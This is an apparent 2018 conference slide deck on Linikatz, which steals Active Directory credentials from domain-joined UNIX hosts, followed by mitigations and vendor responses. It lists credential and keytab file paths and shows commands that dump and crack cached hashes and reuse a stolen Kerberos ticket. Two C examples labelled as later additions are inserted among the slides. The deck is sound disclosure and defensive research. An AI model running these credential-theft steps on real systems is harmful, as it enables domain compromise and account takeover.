Bringing Mimikatz et al to UNIX
Where 2 worlds collide

Tim (Wadhwa-)Brown
Head Of Research, CX EMEAR Security Architecture
November, 2018
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Introduction
• TLDR
• # whoami
• # cat .plan

TLDR
• Presentation is WIP
• Has been iteratively improved off and on over ~9 months
• Contains bonus material from the director's cut at the end
• What this talk is not about
  • Kerberos, LDAP, AD and all that jazz
  • https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
• What this talk is about
  • Why a domain joined UNIX box matters to Enterprise Admins
  • How AD based trust relationships on UNIX boxes are abused
  • How UNIX admins can help mitigate the worst side effects

# whoami
• Tim (Wadhwa-)Brown
• Background in telecoms and financial services sectors
• 14+ years at Portcullis (and now Cisco)
• Head Of Research, CX EMEAR Security Architecture
• >120 CVEs to my name
  • Covering Windows, Linux, AIX and Solaris platforms
  • Userland through to kernel

# cat .plan
• Background
• The theory
• Attack chains
• Practical attacks
• Mitigations
• Recommendations
• Response
• Conclusions
• Bonus material
Background
• Uptick in "interesting" UNIX infrastructures being integrated into customers' existing AD forests
• Threat models should be quite familiar to anyone securing a heterogeneous Windows network but…
  • Perhaps not to a typical UNIX admin who does not have a strong background in Windows and AD
• Let's look at specific AD integration solutions (both open and closed source) for UNIX systems and document some of the tools, tactics and procedures that enable attacks on the forest

Case studies
• Specifically…
  • We keep running into Vintela Authentication Services
  • There's little or no prior research to speak of
  • What about other similar solutions?

Why does this matter?
• Cisco is expected to push the IT envelope
  • CSIRT need to keep our AD estate secure
  • Security Advisory is expected to give expert guidance from both a blue and red team perspective
  • Talos, ATA et al are expected to provide cutting edge threat detection
• Our customers want to mature their security posture from a defensive standpoint

The theory

Introducing AD on UNIX

Like LSASS, limited GPO support

Attack chains
Vintela Authentication Services*
* AKA One Identity Authentication Services

Here be dragons? Interesting?

Other vendors do exist*
* Mo' binaries, mo' bugs… the pace of research determines the pace of disclosure, but I have already started speaking to them

Fundamental truth
• Windows security has progressed
• Linux and UNIX security is still stuck in the mid 70s
  • Reliant on UIDs and GIDs
  • Largely applied at the file system

Windows 8.1 has…
• Restricted admin mode for RDP
• LSA protection
• Protected Users security group
• TPM

Windows 10 has…
• LSA credential isolation

Me: "What if I could get into a UNIX box and then breach your domain?"

Thought process
• UNIX boxes and the applications that run on them often suffer from technical debt
• You submit your AD credentials to log in over SSH
• So tell me, what else do you have access to in Windows-land?
• Also, how about other UNIX systems?

Practical attacks
Practical attacks
• Sssd
• Vintela Authentication Services
• LDAP
• Kerberos

Sssd
• Open source
• Potential attacks
  • Stealing hashes from the file system
  • Stealing hashes and plain text from memory
  • Messing with the IPC
• Notes for the blue team
  • Runs as "root" user
  • Integrates with SELinux
  • Has compile time hardening

Sssd has a somewhat patchy record
• CVE-2018-10832 – Allows enumeration of sudo rules
• CVE-2017-12173 – Allows cached hashes to be retrieved
• CVE-2013-0219 – Allows abuse of symlink based race conditions
• Many, many crashes
• POCs please?

But we digress…

Sssd
Filename / Contains (each file is rated Useful: Yes or Maybe on the slide)
  /var/lib/sss/db/cache_<domain>.ldb          Cached hashes
  /var/lib/sss/db/ccache_<realm>              Server ticket cache for authenticating to the KDC
  /var/lib/sss/db/config.ldb                  Configuration
  /var/lib/sss/pipes/{nss,pam}                PAM to sssd IPC
  /var/lib/sss/pipes/private/{pam,sbus-*}     PAM and SBus private IPC
  /tmp/ccache_                                Per-user ticket cache for authenticating to the KDC
  /etc/sssd/sssd.conf                         Configuration
  /etc/krb5.keytab                            Server keytab for authenticating to the KDC
Vintela Authentication Services
• Proprietary, multi-platform
• Potential attacks
  • Stealing hashes from the file system
  • Stealing hashes and plain text from memory
  • Messing with the IPC
• Notes for the blue team
  • Runs as "daemon" but doesn't drop real UID 0
  • Has no compile time hardening
  • Has no integration with SELinux

Vintela Authentication Services
Filename / Contains (each file is rated Useful: Yes or Maybe on the slide)
  /var/opt/quest/vas/authcache/vas_auth.vdb   Cached hashes
  /var/opt/quest/vas/vasd/vas_ident.vdb       AD/POSIX metadata
  /var/opt/quest/vas/vasd/vas_misc.vdb        Configuration
  /var/opt/quest/vas/vasd/.vasd40_ipc_sock    PAM to vasd IPC
  /tmp/krb55cc.                               Per-user ticket cache for authenticating to the KDC
  /etc/opt/quest/vas/vas.conf                 Configuration
  /etc/opt/quest/vas/host.keytab              Server keytab for authenticating to the KDC

LDAP
• Stealing hashes and plain text from memory
• MiTM attacks due to incorrectly enforced SSL
• Injection attacks due to missing input validation

Kerberos
• Stealing tickets from the file system

Introducing Linikatz

Introducing Linikatz
• Setting the bar low^Whigh
  • We need UID 0 to perform these attacks
  • These attacks are (now) well known in the Windows world
• But…
  • Hashes
  • Plain text
  • Tickets
Stealing hashes
• Hashes can be stolen with standard UNIX tools
  • find, cp
• Actually using them takes a bit more work!

Breaking hashes
• Sssd?
• Vintela Authentication Services?

Sssd
  # tdbdump /var/lib/sss/db/cache_3RD-PARTY.EXAMPLE.ORG.ldb | grep cachedPassword | cut -f 2-4 -d "$" | cut -f 1 -d "\\" | sed "s/^/$/g"
  $6$ypUn2CGi5h3aAqfA$pHxtykM4a6aCG1XQXnyClqtCPeDgDOA4nIDIeMWv2vlD1dxld0hc9fAc4252l5U8/2Ju0mUTE/u4KrSET7pCF.
  # tdbdump /var/lib/sss/db/cache_3RD-PARTY.EXAMPLE.ORG.ldb | grep cachedPassword | cut -f 2-4 -d "$" | cut -f 1 -d "\\" | sed "s/^/$/g" > hash.txt
  # JohnTheRipper-1.8.0-jumbo-1/run/john --wordlist=dict.txt hash.txt
  …
  Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 64/64 OpenSSL])
  # JohnTheRipper-1.8.0-jumbo-1/run/john --show hash.txt
  ?:Administrat0r!
  1 password hash cracked, 0 left

Vintela Authentication Services?
• SQLite database
• Bespoke hashing algorithms
• Yay, symbols

Bespoke hashing algorithms
• Legacy – not found in the wild
• Sha1256 – I needed to reverse the algorithm and implement it in JtR
  • Salted with UUID
  • Formatting important

[Figure: layout of the hashed input – CONST1 (#), UUID (salt), CONST2 (-), password]
JtR rules
  [List.Generic:dynamic_1602]
  Expression=sha256(#.$salt.-.$pass) vas_auth
  Flag=MGF_INPUT_32_BYTE
  Flag=MGF_USERNAME
  Flag=MGF_SALTED
  Flag=MGF_FLAT_BUFFERS
  CONST1=#
  CONST2=-
  SALTLEN=36
  Func=DynamicFunc__clean_input
  Func=DynamicFunc__append_input_from_CONST1
  Func=DynamicFunc__append_salt
  Func=DynamicFunc__append_input_from_CONST2
  Func=DynamicFunc__append_keys
  Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
  Test=$dynamic_1602$$::<username>

Recovering long forgotten memories
• Again we can use "standard" tools to perform plain text recovery on processes
  • gcore||gdb, strings

Please accept my stolen ticket
• Abusing stolen tickets requires a bit more tailored tooling
  • Samba's smbclient & rpcclient
    • smbclient -k -W <domain> -L //<hostname>
  • Core Security's Impacket libraries
    • -k --nopass <domain>/<username>
  • Mimikatz – works from 2014
    • kerberos::clist <ccache> /export – turns UNIX tickets into .kirbi files
  • SSH – not usually supported in practice
  • Wireshark – supports loading keytabs to decrypt traffic
  • Xfreerdp – need to evaluate
Changing identities
  administrator@3RD-PARTY.EXAMPLE.ORG@LNX:~$ klist
  Ticket cache: FILE:/tmp/krb5cc_1245800500_FHo81C
  Default principal: Administrator@3RD-PARTY.EXAMPLE.ORG

  Valid starting     Expires            Service principal
  16/05/18 10:18:23  16/05/18 20:18:23  krbtgt/3RD-PARTY.EXAMPLE.ORG@3RD-PARTY.EXAMPLE.ORG
          renew until 17/05/18 10:18:23
  16/05/18 10:18:26  16/05/18 20:18:23  cifs/3rd-party-dc.3rd-party.example.org@3RD-PARTY.EXAMPLE.ORG
  # cp /tmp/krb5cc_1245800500_FHo81C /tmp/foo
  # chown user:user /tmp/foo
  # su - user
  user@LNX:~$ export KRB5CCNAME=FILE:/tmp/foo
  user@LNX:~$ klist
  Ticket cache: FILE:/tmp/foo
  Default principal: Administrator@3RD-PARTY.EXAMPLE.ORG

  Valid starting     Expires            Service principal
  16/05/18 10:18:23  16/05/18 20:18:23  krbtgt/3RD-PARTY.EXAMPLE.ORG@3RD-PARTY.EXAMPLE.ORG
          renew until 17/05/18 10:18:23
  16/05/18 10:18:26  16/05/18 20:18:23  cifs/3rd-party-dc.3rd-party.example.org@3RD-PARTY.EXAMPLE.ORG

What does Linikatz actually get us?
• Similar to Mimikatz
• A simple shell script
• Capabilities
  • Extracts cached hashes
  • Scrapes process memory for plain text credentials
  • Locates and steals kerberos tickets
  • Dumps configuration and other metadata

And also…
• Post-exploitation modules for Metasploit
• JtR rules for cracking cached hashes
• Auditd policies to help blue teams
• Eventually… research notes, fuzzers etc

https://github.com/portcullislabs/linikatz*
* Blue and red team goodness!
Linikatz repo
  linikatz.sh
  red/
    JohnTheRipper/
      dynamic.conf
    metasploit-framework/
      unix_cached_ad_hashes.rb
      unix_kerberos_tickets.rb
  blue/
    audit/
      audit.rules
  data/ – will contain research notes
  tools/ – will contain tools that I've developed

Mitigations

Mitigations
• Generic hardening
• Restrict UID 0
• Restrict ptrace()
• Protect resources with SELinux
• Auditing?
• RTFM

Generic hardening
• Turning off credential caching on Windows has been a standard issue in reports for ~10 years
• Reducing plain text disclosures by tuning CredSSP has been a standard issue in reports for ~3-4 years
• Avoid domain joined service access
• Consider having separate domain accounts for (privileged) UNIX access
• … and so on …

Restrict UID 0
• Patch
• unix-privesc-check

Restrict ptrace()
• Restrict CAP_SYS_PTRACE
• Yama et al
• getsebool deny_ptrace

Protect resources with SELinux
• Sssd* already does this
• You'll need to
  • Define entry points
  • Define process types
  • Label files
* Breaking news, apparently so does Vintela (if you manage to locate their GitHub repo)
Auditing?
• Auditing is rarely turned on
• In cases where auditing is available, it's not ingested into the threat analytics platform

RTFM
• https://linux.die.net/man/5/sssd.conf
  • Credential caching
• https://support.oneidentity.com/authentication-services/kb/71261/vas-conf-manpage-for-qas-3-5-2
  • Keytab encryption types
  • Credential caching
  • etc

Ensure Kerberos isn't enabled in SSH if you're not using it
• Both sssd and Vintela Authentication Services will enable Kerberos ticket generation
• Not actually used
• Probably not switched on
• Check!

Recommendations

Recommendations
• Harden your binaries
  • Permissions
  • Memory management
  • Cryptography

Permissions
• Drop unnecessary privileges entirely
• Don't leave sockets world writable
• Don't leave configuration and metadata world readable
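The three "harden your binaries" recommendations (permissions, memory management, cryptography) applied to one credential-checking routine, as an added example that is not code from the talk, Linikatz or any vendor. It assumes Linux (prctl) and uses a stand-in derivation function in place of a real KDF so that it runs offline.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <string.h>
#include <sys/prctl.h>

/* Zero a buffer in a way the optimiser cannot drop: a plain memset() on
 * memory that is never read again is a dead store and may be elided, which
 * is the catch behind "consider memset() to clean down memory". */
void secure_zero(void *p, size_t n)
{
    volatile unsigned char *v = (volatile unsigned char *)p;
    while (n--)
        *v++ = 0;
}

/* Constant-time equality: runtime depends on n only, not on where the first
 * differing byte sits, so timing cannot leak a stored verifier byte by byte. */
int ct_equal(const unsigned char *a, const unsigned char *b, size_t n)
{
    unsigned char acc = 0;
    for (size_t i = 0; i < n; i++)
        acc |= (unsigned char)(a[i] ^ b[i]);
    return acc == 0;
}

/* Non-dumpable process: no core dumps, and unprivileged users (including the
 * daemon's own UID) cannot ptrace attach. Root still can, hence the deck's
 * separate "restrict UID 0" and Yama advice. Returns 0 on success. */
int lock_down_process(void)
{
    return prctl(PR_SET_DUMPABLE, 0, 0, 0, 0);
}

/* Stand-in verifier derivation (FNV-1a, NOT a KDF) so the example runs
 * offline; a real daemon would use bcrypt/scrypt/Argon2 with many rounds. */
void toy_derive(const char *pw, unsigned char out[16])
{
    uint64_t h = 1469598103934665603ULL;
    for (const unsigned char *c = (const unsigned char *)pw; *c; c++)
        h = (h ^ *c) * 1099511628211ULL;
    for (int i = 0; i < 16; i++)
        out[i] = (unsigned char)(h >> (8 * (i % 8))) ^ (unsigned char)i;
}

/* Verify a supplied password against a stored verifier, then scrub every
 * copy of the secret this function made. Returns 1 on match, 0 otherwise. */
int check_password(const char *supplied, const unsigned char stored[16])
{
    char copy[256];            /* what a PAM module typically holds */
    unsigned char derived[16];
    strncpy(copy, supplied, sizeof copy - 1);
    copy[sizeof copy - 1] = '\0';
    toy_derive(copy, derived);
    int ok = ct_equal(derived, stored, sizeof derived);
    secure_zero(copy, sizeof copy);      /* so gcore/strings find nothing later */
    secure_zero(derived, sizeof derived);
    return ok;
}

/* Helpers for self-checking the above. */
int demo_scrub(void)
{
    unsigned char b[32];
    memset(b, 0xAA, sizeof b);
    secure_zero(b, sizeof b);
    for (size_t i = 0; i < sizeof b; i++)
        if (b[i]) return 0;
    return 1;
}

int demo_check(const char *enrolled, const char *attempt)
{
    unsigned char stored[16];
    toy_derive(enrolled, stored);
    int ok = check_password(attempt, stored);
    secure_zero(stored, sizeof stored);
    return ok;
}
```

Build with the usual hardening flags (SSP, PIE, RELRO) from the Memory management slide; they are compiler options, not source changes.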
Memory management
• Harden your binaries
  • Canaries (SSP)
  • ASLR (PIE/RELRO)
  • Sandboxing (SecComp)
• Protect sensitive memory
  • Restrict ptrace() using PTRACE_TRACEME
  • Consider memset() to clean down memory after use

Cryptography
• Utilise constant time comparisons or blinding for cryptographic comparisons
• KDFs are more suitable than hashing functions for storing credentials
  • Many rounds make work harder

Response

One Identity - Vintela
• Shared their internal SDK which will help me improve my IPC fuzzing
• Have implemented bcrypt() KDF to replace their existing hashing algorithm
• Have been working on a cleanup thread to clean down memory (until now, cleanup was only triggered when objects went out of scope on access)
• Pointed me at their SELinux policies

Other vendors
• Equally responsive but shorter timelines…

Conclusions

Conclusions
• What have we learnt?
• Next steps?
• Thanks

What have we learnt?
• Compromising a domain joined UNIX box could be an easier way into an AD estate
• Hashes and passwords may not be well protected on UNIX
  • Processes certainly aren't
• Trust relationships may not be well understood
• AD on UNIX solutions come with tools to talk to the domain controller (and not just using Kerberos)
• Always read the manual
• More research is required!

Next steps?
• Continued research on Vintela Authentication Services IPC
• POCs for the known Sssd issues
• Continued work with vendors
• Focused research on UNIX Group Policy implementations
• Improving Meterpreter post-exploitation modules
  • No memory dumping capability yet

Thanks
• Active help
  • @santosomar et al – Cisco PSIRT/CSIRT liaison
  • @solardiz – Support with JtR rules
• Borrowed ideas
  • @gentilkiwi – Mimikatz
  • @coresecurity – Impacket
  • @ropnop – Will abuse /tmp/krb5* for tickets
  • @pentestmonkey – UNIX privesc partner in crime
  • @bdamele – Keimpx
  • Many, many more!

Special thanks
• Vendors (One Identity et al)
  • All of whom have been responsive and professional
  • We don't acknowledge the good guys enough!

Questions?
twadhwab@cisco.com / @timb_machine

Bonus material
Approach
• Iterative
  • Build
  • Threat model
  • Audit
  • Review
  • Fuzz
  • Reverse
  • Develop
  • "Fuzz"x2
  • Output

Build
• Create AD forest
• Add UNIX extensions to AD
• Create test accounts for each implementation
• Domain join Linux clients
• Curse every 180 days

Threat model
• Cisco's Threat Builder
• Alternative approaches
  • Microsoft's STRIDE
  • Microsoft's Threat Modelling Tool
• Build a list of things I want to check – Excel (really!)
  • TTPs for Windows adversaries

Audit
• Baseline before and after
• Review changes
  • File locations and permissions – find
  • File contents – vbindiff, hexcurses, strings, grep
  • Processes – ps, /proc
  • Sockets – lsof, netstat
  • Binary SDLC compliance – checksec.sh – shell script

Review
• Understand how the application is meant to function
  • Man pages
  • Configs
  • Logs
    • Turning logging up to maximum really helps
  • Data
  • Internet

Reverse
• Quick and nasty – core dumps
• Understanding the process flow – strace and ltrace
• Getting a feel for the implementation – Hopper
• Documenting key functions – Binary Ninja
Fuzz
• UNIX sockets
  • UNIXSocketScanner
  • Socat
  • But they didn't work…
    • I only spotted this several iterations in…
    • sendmsg() allows you to send a file descriptor
    • None of the standard UNIX tools for working with UNIX sockets really deal with this
    • Vintela uses this to authenticate the client
    • Easy to work around once you spot it
    • Someone needs to fix socat and UNIXSocketScanner
• Kerberos, LDAP implementations etc
  • Not looked at yet

Develop
• Crunching data – shell script
• Creating fuzzing corpus – Perl
  • Extract hex from logs
  • Generate C from hex
• Fuzzers – C, Perl
• Crash handler – shell script
    dmesg | grep vasd | tail -n 1 > state.new
    if [ -n "$(diff state.new state.old)" ]; then
        echo "We have a winner!"   # do sensible things: keep the test case, then mv state.new state.old
    fi

"Fuzz"x2
• Turn up auditing
• Extract hexdump from logs
• Charlie Miller's patented dumbfuzz

Output
• exercise.sh – uses vastool etc to exercise vasd causing syslog to be filled with hexdumps
• rippackets.pl – pipe syslog logs into it to extract raw hexdumps for use as test cases
• vipcreplay.c – generate and replay all test cases (see replay.c)
• replay.c – replay test cases
• vipcpoke.c – replay a single test case
• replay/checkcrash.sh – check for and process crashes
• vipcfuzz.c – generate and dumbfuzz all test cases (see fuzz.c)
• fuzz.c – fuzzing test cases
• checkcrash.sh – check for and process crashes
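The descriptor-passing behaviour from the Fuzz slide, shown from the daemon's side as an added example (not code from the talk, Linikatz or One Identity): the client must attach an SCM_RIGHTS control message to sendmsg(), which byte-forwarding relays such as socat never do, and the daemon can pair the received descriptor with kernel-supplied SO_PEERCRED credentials that the client cannot forge. Assumes Linux; the "token" file is a constructed temp file standing in for whatever the real IPC passes.

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <unistd.h>

/* Client side: one payload byte plus a descriptor as SCM_RIGHTS ancillary data.
 * A bytes-only relay forwards 'A' but never builds this cmsg. */
int send_with_fd(int sock, int fd_to_pass)
{
    char byte = 'A';
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    memset(&u, 0, sizeof u);
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = u.buf, .msg_controllen = sizeof u.buf };
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type = SCM_RIGHTS;
    c->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(c), &fd_to_pass, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Daemon side: read the message and extract the passed descriptor.
 * Returns the new fd, or -1 when no SCM_RIGHTS cmsg accompanied it. */
int recv_fd(int sock)
{
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = u.buf, .msg_controllen = sizeof u.buf };
    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    if (!c || c->cmsg_level != SOL_SOCKET || c->cmsg_type != SCM_RIGHTS)
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(c), sizeof(int));
    return fd;
}

/* Daemon side: kernel-supplied peer credentials (unforgeable, unlike payload). */
int peer_uid(int sock, uid_t *uid)
{
    struct ucred cr;
    socklen_t len = sizeof cr;
    if (getsockopt(sock, SOL_SOCKET, SO_PEERCRED, &cr, &len) != 0)
        return -1;
    *uid = cr.uid;
    return 0;
}

/* End to end over a socketpair. with_fd=1 is a real client, with_fd=0 a
 * bytes-only relay. Returns 1 only if the daemon got a descriptor for the
 * very file the client opened and the peer uid is our own, else 0. */
int demo_exchange(int with_fd)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;
    char path[] = "/tmp/ipc_demo_token_XXXXXX";   /* constructed stand-in */
    int token = mkstemp(path);
    if (token < 0)
        return -1;
    unlink(path);
    int rc = with_fd ? send_with_fd(sv[0], token)
                     : (write(sv[0], "A", 1) == 1 ? 0 : -1);
    int got = (rc == 0) ? recv_fd(sv[1]) : -1;
    int ok = 0;
    if (got >= 0) {
        struct stat a, b;
        uid_t uid;
        ok = fstat(token, &a) == 0 && fstat(got, &b) == 0 &&
             a.st_ino == b.st_ino && a.st_dev == b.st_dev &&
             peer_uid(sv[1], &uid) == 0 && uid == getuid();
        close(got);
    }
    close(token); close(sv[0]); close(sv[1]);
    return ok;
}
```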
Useful links
• https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments – using UNIX tools to attack AD DCs
• https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module – writing Metasploit post-exploitation modules
• http://web.archive.org/web/20161205150219/http://blog.thireus.com/john-the-ripped-steak-and-french-fries-with-salt-and-pepper-sauce-for-hungry-password-crackers/ – writing JtR dynamic.conf rules
• https://github.com/bfuzzy/auditd-attack – example rules for auditd, modelled on ATT&CK